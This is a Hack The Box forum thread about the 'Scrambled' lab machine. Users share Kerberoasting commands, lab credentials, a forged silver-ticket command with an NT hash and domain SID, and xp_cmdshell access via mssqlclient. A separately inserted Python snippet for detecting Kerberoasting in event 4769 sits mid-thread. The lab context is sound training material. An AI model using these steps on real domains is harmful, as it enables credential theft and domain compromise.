Scrambled - HTB [Discussion]
I get valid logins with kerbrute but can't seem to get anything with impacket tools

2022/06/12 04:37:07 >  [+] VALID LOGIN:  [email protected]:ksimpson

2022/06/12 04:36:40 >  [+] VALID LOGIN:  [email protected]:Pegasus60

Any nudge?
Reply
(June 12, 2022, 07:45 AM)yemacaw863 Wrote:
(June 12, 2022, 04:32 AM)thomasratkos Wrote:
(June 12, 2022, 04:16 AM)skyweasel Wrote: Cheers for this post/nudge.

I keep getting "[-] exceptions must derive from BaseException"  from GetUserSPNs.py

annoying.

care to paste the full tgs?



its a problem with the tool, not you.. do some google searching, you might find the creator of the box on github trying to get this issue fixed  :D


i hit a wall after this so if anyone has a nudge after this lmk please   😎


Thanks for the nudges!

Subsequently,
1. Found a "Network Security Changes.pdf" file by "IT Support" using smbclient.py under Public shares.. the following is the summary content:
"(Affects All) When you log on or access network resources you will now be using Kerberos authentication..."
"(Affects HR department) The attacker was able to retrieve credentials from an SQL database used by our HR software so we have removed all access to the SQL service for everyone apart from network administrators"

2. Able to run reg.py to query the windows registry.

And now.. I'm stuck again :(


How did you manage to get the smbclient to work?
Reply
(June 12, 2022, 08:53 AM)langetmama11 Wrote:
(June 12, 2022, 07:45 AM)yemacaw863 Wrote:
(June 12, 2022, 04:32 AM)thomasratkos Wrote:
(June 12, 2022, 04:16 AM)skyweasel Wrote: Cheers for this post/nudge.

I keep getting "[-] exceptions must derive from BaseException"  from GetUserSPNs.py

annoying.

care to paste the full tgs?



its a problem with the tool, not you.. do some google searching, you might find the creator of the box on github trying to get this issue fixed  :D


i hit a wall after this so if anyone has a nudge after this lmk please   😎


Thanks for the nudges!

Subsequently,
1. Found a "Network Security Changes.pdf" file by "IT Support" using smbclient.py under Public shares.. the following is the summary content:
"(Affects All) When you log on or access network resources you will now be using Kerberos authentication..."
"(Affects HR department) The attacker was able to retrieve credentials from an SQL database used by our HR software so we have removed all access to the SQL service for everyone apart from network administrators"

2. Able to run reg.py to query the windows registry.

And now.. I'm stuck again :(


How did you manage to get the smbclient to work?


getTGT.py scrm.local/<user>:<pass> -dc-ip <ip>
export KRB5CCNAME=<user>.ccache
smbclient.py -no-pass -k scrm.local/<user>@dc1.scrm.local

Note: It's impacket's smbclient.py not the regular smbclient
Reply
(June 12, 2022, 03:42 AM)thomasratkos Wrote: get ksimpsons TGT:

getTGT "kerberos+pass://scrm.local\ksimpson:[email protected]" krb_ccache


use kerberos login to get sqlsvc TGS for cracking:

GetUserSPNs.py  -dc-ip dc1.scrm.local scrm.local/sqlsvc -request -k -no-pass

ServicePrincipalName          Name    MemberOf  PasswordLastSet            LastLogon                  Delegation
----------------------------  ------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/dc1.scrm.local:1433  sqlsvc            2021-11-03 12:32:02.351452  2022-06-11 21:41:15.566050           
MSSQLSvc/dc1.scrm.local      sqlsvc            2021-11-03 12:32:02.351452  2022-06-11 21:41:15.566050           



$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$488b33086784ae1b2e7ebdad2f41bb3a$


i can't get this

use kerberos login to get sqlsvc TGS for cracking:
Reply
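From the defender's side, the service-ticket request discussed in this thread shows up on the domain controller as Security event 4769 with ticket encryption type 0x17 (the 23 in `$krb5tgs$23$`). The following is an added example, not part of any post in the thread: a Python filter over constructed 4769 records. The field names follow the Windows event; the client addresses, the second user name and the function name are assumptions.

```python
# Added example: flag Kerberoasting-style TGS requests in event 4769 records.
from collections import defaultdict

RC4_HMAC = 0x17  # etype 23, the "$23$" in the $krb5tgs$23$ hash format

# Constructed sample events. Realm, account and service names come from the
# thread; IP addresses (documentation range) and "user2" are invented.
EVENTS = [
    {"EventID": 4769, "TargetUserName": "ksimpson@SCRM.LOCAL",
     "ServiceName": "sqlsvc", "TicketEncryptionType": "0x17",
     "IpAddress": "192.0.2.50", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "ksimpson@SCRM.LOCAL",
     "ServiceName": "DC1$", "TicketEncryptionType": "0x12",
     "IpAddress": "192.0.2.50", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "ksimpson@SCRM.LOCAL",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x17",
     "IpAddress": "192.0.2.50", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "user2@SCRM.LOCAL",
     "ServiceName": "sqlsvc", "TicketEncryptionType": "0x12",
     "IpAddress": "192.0.2.77", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "user2@SCRM.LOCAL",
     "ServiceName": "sqlsvc", "TicketEncryptionType": "",
     "IpAddress": "192.0.2.77", "Status": "0x0"},
]


def suspicious_tgs_requests(events):
    """Return {(client, source_ip): [service names]} for successful 4769
    events that issued an RC4 ticket for a user-backed service account."""
    hits = defaultdict(list)
    for ev in events:
        if ev.get("EventID") != 4769 or ev.get("Status") != "0x0":
            continue  # wrong event type or failed request
        try:
            etype = int(ev.get("TicketEncryptionType"), 16)
        except (TypeError, ValueError):
            continue  # missing or malformed field: skip instead of crashing
        svc = ev.get("ServiceName", "")
        # Machine accounts end in "$" and krbtgt is the KDC's own account;
        # neither has a human-chosen password worth cracking offline.
        if etype != RC4_HMAC or svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        hits[(ev.get("TargetUserName"), ev.get("IpAddress"))].append(svc)
    return dict(hits)


if __name__ == "__main__":
    for (client, ip), services in suspicious_tgs_requests(EVENTS).items():
        print(f"{client} from {ip} requested RC4 tickets for: {services}")
```

RC4 requests can also come from legacy clients, so a hit is a lead to correlate with request volume per client. Restricting the service account to AES encryption types and giving it a long random password removes the crackable target.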
(June 12, 2022, 09:10 AM)yemacaw863 Wrote:
(June 12, 2022, 08:53 AM)langetmama11 Wrote:
(June 12, 2022, 07:45 AM)yemacaw863 Wrote:
(June 12, 2022, 04:32 AM)thomasratkos Wrote:
(June 12, 2022, 04:16 AM)skyweasel Wrote: Cheers for this post/nudge.

I keep getting "[-] exceptions must derive from BaseException"  from GetUserSPNs.py

annoying.

care to paste the full tgs?



its a problem with the tool, not you.. do some google searching, you might find the creator of the box on github trying to get this issue fixed  :D


i hit a wall after this so if anyone has a nudge after this lmk please   😎


Thanks for the nudges!

Subsequently,
1. Found a "Network Security Changes.pdf" file by "IT Support" using smbclient.py under Public shares.. the following is the summary content:
"(Affects All) When you log on or access network resources you will now be using Kerberos authentication..."
"(Affects HR department) The attacker was able to retrieve credentials from an SQL database used by our HR software so we have removed all access to the SQL service for everyone apart from network administrators"

2. Able to run reg.py to query the windows registry.

And now.. I'm stuck again :(


How did you manage to get the smbclient to work?


getTGT.py scrm.local/<user>:<pass> -dc-ip <ip>
export KRB5CCNAME=<user>.ccache
smbclient.py -no-pass -k scrm.local/<user>@<ip> -dc-ip <ip>

Note: It's impacket's smbclient.py not the regular smbclient


@qwerty173 / @jon01 any nudge? :D


After several tries, I still get errors with the smbclient

python3 smbclient.py -k -no-pass scrm.local/[email protected] -dc-ip 10.129.xx.xx
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
Reply
https://github.com/SecureAuthCorp/impacket/issues/1206

then run 

impacket-GetUserSPNs scrm.local/ksimpson:ksimpson -k -dc-ip dc1.scrm.local -no-pass -request
Reply
(June 12, 2022, 11:43 AM)jon01 Wrote:
(June 12, 2022, 07:45 AM)yemacaw863 Wrote:
(June 12, 2022, 04:32 AM)thomasratkos Wrote:
(June 12, 2022, 04:16 AM)skyweasel Wrote: Cheers for this post/nudge.

I keep getting "[-] exceptions must derive from BaseException"  from GetUserSPNs.py

annoying.

care to paste the full tgs?



its a problem with the tool, not you.. do some google searching, you might find the creator of the box on github trying to get this issue fixed  :D


i hit a wall after this so if anyone has a nudge after this lmk please   😎


Thanks for the nudges!

Subsequently,
1. Found a "Network Security Changes.pdf" file by "IT Support" using smbclient.py under Public shares.. the following is the summary content:
"(Affects All) When you log on or access network resources you will now be using Kerberos authentication..."
"(Affects HR department) The attacker was able to retrieve credentials from an SQL database used by our HR software so we have removed all access to the SQL service for everyone apart from network administrators"

2. Able to run reg.py using both users to query the windows registry (different results).

And now.. I'm stuck again :(


@qwerty173 / @jon01 any nudge? :D

impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn MSSQLSVC/scrm.local -user-id 500 Administrator           

// maybe this can help :P
impacket-mssqlclient
enable_xp_cmdshell
and get a shell :


i'm not able to connect mssqlclient.py client and btw how did u get nthash and domain-sid ?
Reply
(June 12, 2022, 12:08 PM)jon01 Wrote:
(June 12, 2022, 12:00 PM)hacker1111 Wrote:
(June 12, 2022, 11:43 AM)jon01 Wrote:
(June 12, 2022, 07:45 AM)yemacaw863 Wrote:
(June 12, 2022, 04:32 AM)thomasratkos Wrote: its a problem with the tool, not you.. do some google searching, you might find the creator of the box on github trying to get this issue fixed  :D


i hit a wall after this so if anyone has a nudge after this lmk please   😎


Thanks for the nudges!

Subsequently,
1. Found a "Network Security Changes.pdf" file by "IT Support" using smbclient.py under Public shares.. the following is the summary content:
"(Affects All) When you log on or access network resources you will now be using Kerberos authentication..."
"(Affects HR department) The attacker was able to retrieve credentials from an SQL database used by our HR software so we have removed all access to the SQL service for everyone apart from network administrators"

2. Able to run reg.py using both users to query the windows registry (different results).

And now.. I'm stuck again :(


@qwerty173 / @jon01 any nudge? :D

impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn MSSQLSVC/scrm.local -user-id 500 Administrator           

// maybe this can help :P
impacket-mssqlclient
enable_xp_cmdshell
and get a shell :


i'm not able to connect mssqlclient.py client and btw how did u get nthash and domain-sid ?

export KRB5CCNAME=Administrator.ccache // try this


mssqlclient.py dc1.scrm.local/[email protected] -k -no-pass

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*]Encryption required, switching to TLS
[-] Kerberos SessionError: KDC_ERR_WRONG_REALM(Reserved for future use)
Reply
(June 12, 2022, 12:28 PM)jon01 Wrote:
(June 12, 2022, 12:17 PM)hacker1111 Wrote:
(June 12, 2022, 12:08 PM)jon01 Wrote:
(June 12, 2022, 12:00 PM)hacker1111 Wrote:
(June 12, 2022, 11:43 AM)jon01 Wrote: impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn MSSQLSVC/scrm.local -user-id 500 Administrator           

// maybe this can help :P
impacket-mssqlclient
enable_xp_cmdshell
and get a shell :


i'm not able to connect mssqlclient.py client and btw how did u get nthash and domain-sid ?

export KRB5CCNAME=Administrator.ccache // try this


mssqlclient.py dc1.scrm.local/[email protected] -k -no-pass

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*]Encryption required, switching to TLS
[-] Kerberos SessionError: KDC_ERR_WRONG_REALM(Reserved for future use)


impacket-mssqlclient -k scrm.local


I got it but it's sqlsvc shell not Administrator
Reply
(June 12, 2022, 11:43 AM)jon01 Wrote:
(June 12, 2022, 07:45 AM)yemacaw863 Wrote:
(June 12, 2022, 04:32 AM)thomasratkos Wrote:
(June 12, 2022, 04:16 AM)skyweasel Wrote: Cheers for this post/nudge.

I keep getting "[-] exceptions must derive from BaseException"  from GetUserSPNs.py

annoying.

care to paste the full tgs?



its a problem with the tool, not you.. do some google searching, you might find the creator of the box on github trying to get this issue fixed  :D


i hit a wall after this so if anyone has a nudge after this lmk please   😎


Thanks for the nudges!

Subsequently,
1. Found a "Network Security Changes.pdf" file by "IT Support" using smbclient.py under Public shares.. the following is the summary content:
"(Affects All) When you log on or access network resources you will now be using Kerberos authentication..."
"(Affects HR department) The attacker was able to retrieve credentials from an SQL database used by our HR software so we have removed all access to the SQL service for everyone apart from network administrators"

2. Able to run reg.py using both users to query the windows registry (different results).

And now.. I'm stuck again :(


@qwerty173 / @jon01 any nudge? :D

impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn MSSQLSVC/scrm.local -user-id 500 Administrator           

// maybe this can help :P
impacket-mssqlclient
enable_xp_cmdshell
and get a shell :


Any nudge on how to get the Domain-Sid and the nthash?
Reply

